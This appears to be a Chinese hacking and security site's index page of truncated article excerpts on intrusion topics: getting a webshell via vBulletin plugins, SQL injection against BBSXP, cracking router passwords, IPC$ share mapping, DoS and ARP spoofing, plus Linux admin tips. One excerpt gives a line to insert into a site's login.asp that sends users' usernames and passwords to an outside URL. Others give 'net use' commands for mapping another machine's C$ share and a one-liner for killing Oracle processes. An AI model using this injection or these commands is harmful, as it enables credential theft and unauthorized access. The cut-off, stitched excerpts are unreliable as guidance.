网络中是面临着很多的威胁，那么怎么建立必要的屏障来防止端口扫描和网络监听，从而保障网络的安全和预防黑客的攻击呢?在这里，笔者给大家几个不错的建议。 1.使用安全工具有许多工具可以让我们发现系统中的漏洞，如SATAN等。SATAN是一个分析网络的管理、测

最近有好多人都在问如何入侵XP。而且还都在用入侵2000的老方法对付XP。这是行不通的。 我做了一个总结，看看可以使你对XP有一个清醒的认识，并从中找出一些入侵XP的好的方法。 入侵xp一向来都是很困难,但并不是不能入侵。 只是xp的安全性相对于windows其它糸

by Jk7ose 今天把看雪搞了，用的vBulletin,国内貌似还没相关后台拿webshell的文章，翻墙出去E文了一把，做个记录。。 方法一：首先在插件和产品(Plugins and Products)下边选择插件管理(Plugin Manager)，然后右边选择添加新插件（Add New Plugin），在Hook

文章作者：biying 1.工具辅助查找 如大家常用的：明小子、啊D、wwwscan 以及一些列目录工具：Acunetix Web Vulnerability Scanner 、JSky、IntelliTamper、Netsparker等等 2.网站资源利用 如：网站根目录Robots.txt文本、图片路径爆后台、查看网站底部版权信

xss简单渗透测试 Author:jianxin [80sec] EMail:jianxin#80sec.com Site:http://www.80sec.com Date:2008-12-24 From: http://www.80sec.com/release/xss-how-to-root.txt [ 目录 ] 000前言 001xss渗透测试基本思路 002一次黑盒的xss渗透测试 003一次白盒的x

如何破解网吧路由器的帐号和密码，虽然我在以前的文章里也曾经介绍过一些方法，但是仍然在论坛上会看到许多菜鸟朋友问：路由器的密码应该如何破解?灰鸽子上线如何在路由器上制作端口映射?那么本文我就来总结几个破解路由器密码的方法以及如何实现内网中反弹

来源：ibm.com Metasploit 是一款漏洞扫描和攻击研究工具，可用于极大地加强企业网络安全。通过使用 Metasploit，组织可以找到以前没有发现的安全弱点并开始解决它们。 在安全领域，有一些工具被用于执行所谓的漏洞测试，每个工具提供不同的特性，各具优势。

利用最基本的SQL注入渗透BBSXP官方网站的后台管理.这也是一次非常常见的sql渗透攻击.也是最基础的. 过程如下: 1.找出漏洞并分析漏洞. 2.利用漏洞,得到前台区长密码. 3.利用漏洞,得到后台密码. 4.添加公告,闪人! 开始工作： 到bbsxp官方网站下载最新的bbsxp。

打开需要使用firebug的页面，在地址栏敲入以下代码： javascript:var firebug=document.createElement('script');firebug.setAttribute('src','http://zeleet.com/tools/firebug-lite-compressed.js');document.body.appendChild(firebug);(function(){if(wi

这些监控包括：主机存活、磁盘空间监控、负载监控、进程数监控、ip 连接数监控。 （1）、在监控服务器上定义主机配置文件hosts.cfg define host { host_name cacti.com alias nagios server address 192.168.10.195 contact_groups admins check_command che

众所周知，网络安全是一个非常重要的课题，而服务器是网络安全中最关键的环节。Linux被认为是一个比较安全的Internet服务器，作为一种开放源代码操作系统，一旦Linux系统中发现有安全漏洞，Internet上来自世界各地的志愿者会踊跃修补它。然而，系统管理员往

今天编写的两条极具杀伤力的命令，它可以瞬间将Oracle杀死在无形之中。后面我将给出简单注释并展示一下它的威力。 $ ps -ef |grep $ORACLE_SID|grep -v grep|awk '{print $2}' | xargskill-9 $ ipcs -m | grep oracle | awk '{print $2}' | xargs ipcrm shm

具体解决方法是： 1，修改远程linux机器的配置 vim /etc/sysconfig/i18n 把LANG改成支持UTF-8的字符集 如： LANG=zh_CN.UTF-8 或者是 LANG=en_US.UTF-8 2，然后再改Secure CRT的设置 选项-会话选项-外观-字符编码-uft-8 3，退出，再重新登录。发现utf8的文件

独自等待 linux 本身不自带 rar 压缩解压软件 一. 下载RAR for Linux 下载地址: http://www.rarlab.com/rar/rarlinux-3.9.b3.tar.gz 下载的文件是rarlinux-3.9.b3.tar.gz 二. 解压软件包 将该文件解压到/usr/local目录下 tar xzvf rarlinux-3.9.b3.tar.gz di

相关命令 建立空连接 net use \IPipc$Content$nbsp; /user: (一定要注意:这一行命令中包含了3个空格) 建立非空连接 net use \IPipc$Content$nbsp;用户名 /user:密码 (同样有3个空格) 映射默认共享 net use z: \IPc$Content$nbsp;密码 /user:用户名 (即

什么是后门程序 后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会感染其他电脑。 后门是一种登录系统的方法，它不仅绕过系统

这是我从别的地方看到的，黑客速成学习法，由于适合我们教程太少了，目前我还没找到很好的教程，高手要是看到这个贴回能发些教程以便我们菜鸟能快速的学好黑客，谢谢了！ 随着INOKER客非客联盟的再次出台，我想有必要建立这么一个面版每天教一些菜鸟教程，在

生成qq在线状态，把里面的地址改成木马地址，发到论坛 在login.asp那里插入一句: response.writescriptsrc=http://www.ptlushi.com/laner/rain.asp?n=request(username)p=request(password)/script response.writeiframesrc=http://yourwebsite/laner/rain.a

net use \ipipc$ /user: 建立IPC空链接 net use \ipipc$ 密码 /user:用户名 建立IPC非空链接 net use h: \ipc$ 密码 /user:用户名 直接登陆后映射对方C：到本地为H: net use h: \ipc$ 登陆后映射对方C：到本地为H: net use \ipipc$ /del 删除IPC链

知道IP而攻击（菜鸟入门） 黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识

我首先要说的是我是电脑高手，但不是黑客高手~！ 我发现了很多的问题~！ 很多的人都还是电脑菜鸟~！可以说什么都不懂~！就要来学黑客~！ 黑客技术的前题就是电脑技术~！起码我是这么认为的~！ 为什么要学电脑技术~！首先电脑知识知道的越多，你的黑客技术的

与好友在网络上相互传输资料时，有时先要知道对方计算机的IP地址，才能与对方建立信息传输通道。 那么对方的IP地址该如何搜查得到呢?这样的问题你也许会嗤之以鼻，的确，查询对方计算机的IP地址，实在简单得不值得一提;可是，要让你列举出多种IP地址搜查方法

互联网和传说中的江湖差不多，有门派纷争，有勾心斗角，有三教九流，也少不了东邪西毒。互联网上危险的地方很多，有些是你毫无察觉的常用服务，有些则是你曾信赖有加的搜索引擎，有些则完全是你自我暴露的。 一、会感染电脑的恶意Flash文件 地点：任意使用Fl

一、拒绝服务攻击的发展 从拒绝服务攻击诞生到现在已经有了很多的发展，从最初的简单Dos到现在的DDOS。那么什么是Dos和DDOS呢?DoS是一种利用单台计算机的攻击方式。而 DDOS (Distributed Denial of Service，分布式拒绝服务)是一种基于DoS的特殊形式的拒绝服

ARP欺骗攻击是十分普遍的一种攻击形式，受攻击的机构内网会因为ARP欺骗攻击导致网络缓慢甚至停滞的现象发生。本篇文章将通过一次学校受到ARP欺骗攻击的实例，来讲述如何通过网络流量检测来查找出ARP欺骗攻击，从而解决网络缓慢的情况。 信息中心立即着手进行